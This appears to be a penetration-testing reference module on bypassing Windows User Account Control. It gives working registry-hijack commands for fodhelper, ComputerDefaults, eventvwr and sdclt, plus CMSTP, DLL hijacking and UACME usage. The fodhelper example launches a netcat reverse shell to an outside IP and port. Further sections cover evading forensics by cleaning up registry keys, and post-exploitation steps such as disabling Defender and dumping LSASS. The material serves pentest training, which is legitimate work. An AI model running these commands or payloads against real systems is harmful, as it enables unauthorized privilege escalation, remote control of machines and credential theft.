Back to All Modules

UAC Bypass

#Overview

User Account Control (UAC) prevents unauthorized elevation from medium-integrity to high-integrity processes. When a user is in the local Administrators group but running in a medium-integrity context (admin approval mode), UAC bypass techniques allow elevation without the UAC prompt. These techniques exploit auto-elevated binaries that bypass UAC or manipulate registry keys used by auto-elevated processes.

#Prerequisites

  • User in the local Administrators group (check with net localgroup administrators)
  • Running in admin approval mode (medium integrity, not high integrity)
  • Write access to specific registry keys (HKCU)

#Detection & Enumeration

rem Check if user is in Administrators group
net user %USERNAME% | findstr /i "Administrators"
net localgroup administrators

rem Check integrity level
whoami /groups | findstr /i "Mandatory Label"
rem Mandatory Label\Medium Mandatory Level -- UAC bypass needed
rem Mandatory Label\High Mandatory Level -- Already elevated, no bypass needed

rem Check UAC level
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
CMD
# PowerShell integrity check
[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups | Where-Object {$_.Value -match "S-1-16"}
# S-1-16-8192 = Medium
# S-1-16-12288 = High
# S-1-16-16384 = System
POWERSHELL

#Exploitation / Execution

#Fodhelper Bypass (Most Common)

# fodhelper.exe is an auto-elevated binary that reads registry keys
# Exploit by creating a malicious registry key:

reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /d "cmd.exe /c C:\Windows\Temp\nc64.exe 10.10.14.5 4444 -e cmd" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f

# Trigger elevation
fodhelper.exe

# Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f
POWERSHELL

#ComputerDefaults.exe Bypass

reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f

ComputerDefaults.exe

reg delete "HKCU\Software\Classes\ms-settings" /f
POWERSHELL

#eventvwr.exe (Event Viewer) Bypass

# Event Viewer loads mmc.exe, which loads a registry-specified snap-in
# Create a malicious registry entry for mmc.exe:

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f

eventvwr.exe

reg delete "HKCU\Software\Classes\mscfile" /f
POWERSHELL

#sdclt.exe (Backup and Restore) Bypass

# sdclt.exe loads ISecurityEditor from registry at start
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f

# Trigger by running sdclt with specific arguments
sdclt.exe /kickoffelev

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
POWERSHELL

#Auto-Elevated Binary List

These binaries auto-elevate to high integrity without UAC prompts:

fodhelper.exe           # Features On Demand helper
ComputerDefaults.exe    # Computer defaults configuration
eventvwr.exe            # Event Viewer
sdclt.exe               # Backup and Restore
WSReset.exe             # Windows Store reset
wuauclt.exe             # Windows Update (older)
slui.exe                # Windows Activation
TEXT

#DLL Hijacking for UAC Bypass

Some auto-elevated processes load DLLs from HKCU-writable paths:

# Use Process Monitor to identify DLLs loaded by auto-elevated binaries
# Look for DLLs loaded from user-writable locations (AppData, temp, etc.)
# Create a malicious DLL in the detected path
POWERSHELL

#UACME Project

# Comprehensive UAC bypass collection: https://github.com/hfiref0x/UACME
# 60+ bypass methods, each with a numeric ID
# Akagi64.exe <method_number>

# Example:
Akagi64.exe 33  # fodhelper method
Akagi64.exe 61  # ComputerDefaults method
BASH

#Additional UAC Bypass Techniques

# CMSTP UAC bypass — Uses cmstp.exe COM object
cmstp.exe /s C:\temp\payload.inf
# The INF file loads a COM SCT file that executes commands at medium integrity → high integrity

# Token Broker UAC bypass — Windows 11 specific
# Exploits the TokenBroker service COM interface
# Reference: https://github.com/hfiref0x/UACME (method 72+)

# Environment Variable UAC bypass
# Manipulates SystemRoot to redirect DLL loading
set SystemRoot=C:\temp\fake
# Create fake directory structure with malicious DLLs
# Works when certain auto-elevated processes load DLLs from SystemRoot

# ICMLuaUtil COM interface bypass
# Uses the ICMLuaUtil COM interface to execute commands at high integrity
# Method 63 in UACME
POWERSHELL

#UAC Consent Level Check

# Check UAC consent level — determines which bypasses work
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
# 0 = No prompt (UAC disabled) — all bypasses work
# 1 = Prompt for credentials on secure desktop — most bypasses fail
# 2 = Prompt for consent on secure desktop — most bypasses work
# 3 = Prompt for credentials — most bypasses fail
# 4 = Prompt for consent — most bypasses work
# 5 = Prompt for consent for non-Windows binaries — most bypasses work (default)

# Also check:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
# 0 = UAC disabled entirely (no prompts)
# 1 = UAC enabled
POWERSHELL

#Common Pitfalls

  • UAC must be set to one of the lower levels (not "Always Notify"); the default level works for most bypasses
  • Admin approval mode must be enabled (user is administrator but running in medium integrity)
  • Registry keys must be created in HKCU (current user registry hive) which is always writable
  • Some bypasses only work on specific Windows versions (Windows 10 vs 11, specific builds)
  • Microsoft Defender may flag UAC bypass techniques and auto-elevated binary abuse
  • The spawned process is high integrity but NOT SYSTEM -- further escalation may be needed

#OPSEC Considerations

  • Registry key creation in HKCU is standard behavior and not monitored by default.
  • Running auto-elevated binaries triggers application compatibility telemetry in Windows.
  • The spawned high-integrity process creates a visible process tree that may be anomalous.
  • UAC bypass is a well-known technique; many EDR products monitor for registry keys associated with known bypasses.
  • Clean up registry keys after exploitation to reduce forensic evidence.
  • The bypass itself is not logged in Security event log (no event 4688 for the elevated process with special privileges).

#Post-Exploitation Value

UAC bypass provides high-integrity (Administrator) access. From high integrity: disable Defender (Set-MpPreference), dump LSASS (requires SeDebugPrivilege which admins have), install services, modify system configurations, and perform most administrative functions. Full SYSTEM escalation may require additional steps (service creation, token stealing).

#Cross-References

#Tool References

ToolLink
UACMEhttps://github.com/hfiref0x/UACME

#Source Machines

  • Generic Windows - UAC bypass via fodhelper, ComputerDefaults, or eventvwr